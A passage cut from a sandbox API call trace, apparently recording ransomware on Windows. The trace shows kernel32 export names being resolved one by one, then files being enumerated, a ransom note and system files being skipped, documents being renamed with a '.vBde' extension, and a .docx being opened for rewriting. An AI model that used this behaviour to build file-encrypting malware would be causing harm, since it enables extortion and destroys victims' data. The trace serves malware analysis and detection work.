lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.983] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.983] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.983] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.983] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.983] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.983] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.984] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.984] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.984] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.984] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.984] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.984] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.984] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.984] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.984] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.984] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.984] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.984] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.984] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.984] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.984] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.984] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.984] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.984] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.984] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.985] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.985] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.985] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.985] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.985] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.985] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.985] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.985] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.985] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.985] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.985] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.985] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.985] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.985] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.985] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.985] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.985] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.985] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.985] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.986] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.986] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.986] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.986] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.986] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.986] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.986] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.986] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.986] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.986] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.986] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.986] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.986] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.986] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.986] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.986] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.986] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.986] lstrlenA (lpString="DELETEATOM") returned 10 [0083.986] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.986] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.987] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.987] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.987] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.987] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.987] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.987] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.987] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.987] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.988] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.988] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.988] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.988] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.988] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.988] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.988] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.988] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.988] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.988] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.988] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.988] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.988] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.988] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.988] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.988] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.988] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.988] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.988] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.989] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.989] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.989] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.989] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.989] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.989] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.989] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.989] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.989] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.989] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.989] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.989] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.989] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.989] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.989] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.989] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.990] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\jM5KvsW.pps") returned 69 [0083.990] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\jM5KvsW.pps.vBde") returned 74 [0083.990] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\jM5KvsW.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\jm5kvsw.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\jM5KvsW.pps.vBde" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\jm5kvsw.pps.vbde"), dwFlags=0x0) returned 1 [0083.990] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.990] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.990] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.991] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24fbcbe0, ftCreationTime.dwHighDateTime=0x1d4d4ce, ftLastAccessTime.dwLowDateTime=0x868202d0, ftLastAccessTime.dwHighDateTime=0x1d4d13b, ftLastWriteTime.dwLowDateTime=0x868202d0, ftLastWriteTime.dwHighDateTime=0x1d4d13b, nFileSizeHigh=0x0, nFileSizeLow=0x4be4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MxmcYlbU.docx", cAlternateFileName="MXMCYL~1.DOC")) returned 1 [0083.991] lstrcmpiW (lpString1="MxmcYlbU.docx", lpString2="DECRYPT-FILES.txt") returned 1 [0083.991] lstrcmpiW (lpString1="MxmcYlbU.docx", lpString2="autorun.inf") returned 1 [0083.991] lstrcmpiW (lpString1="MxmcYlbU.docx", lpString2="boot.ini") returned 1 [0083.991] lstrcmpiW (lpString1="MxmcYlbU.docx", lpString2="desktop.ini") returned 1 [0083.991] lstrcmpiW (lpString1="MxmcYlbU.docx", lpString2="ntuser.dat") returned -1 [0083.991] lstrcmpiW (lpString1="MxmcYlbU.docx", lpString2="iconcache.db") returned 1 [0083.991] lstrcmpiW (lpString1="MxmcYlbU.docx", lpString2="bootsect.bak") returned 1 [0083.991] lstrcmpiW (lpString1="MxmcYlbU.docx", lpString2="ntuser.dat.log") returned -1 [0083.991] lstrcmpiW (lpString1="MxmcYlbU.docx", lpString2="thumbs.db") returned -1 [0083.991] lstrcmpiW (lpString1="MxmcYlbU.docx", lpString2="Bootfont.bin") returned 1 [0083.991] lstrlenW (lpString="MxmcYlbU.docx") returned 13 [0083.991] lstrcmpiW (lpString1="docx", lpString2="lnk") returned -1 [0083.991] lstrcmpiW (lpString1="docx", lpString2="exe") returned -1 [0083.991] lstrcmpiW (lpString1="docx", lpString2="sys") returned -1 [0083.991] lstrcmpiW (lpString1="docx", lpString2="dll") returned 1 [0083.991] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0083.991] lstrlenW (lpString="MxmcYlbU.docx") returned 13 [0083.991] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0083.991] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="MxmcYlbU.docx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\MxmcYlbU.docx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\MxmcYlbU.docx" [0083.991] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\MxmcYlbU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\mxmcylbu.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0083.992] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=19428) returned 1 [0083.992] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, 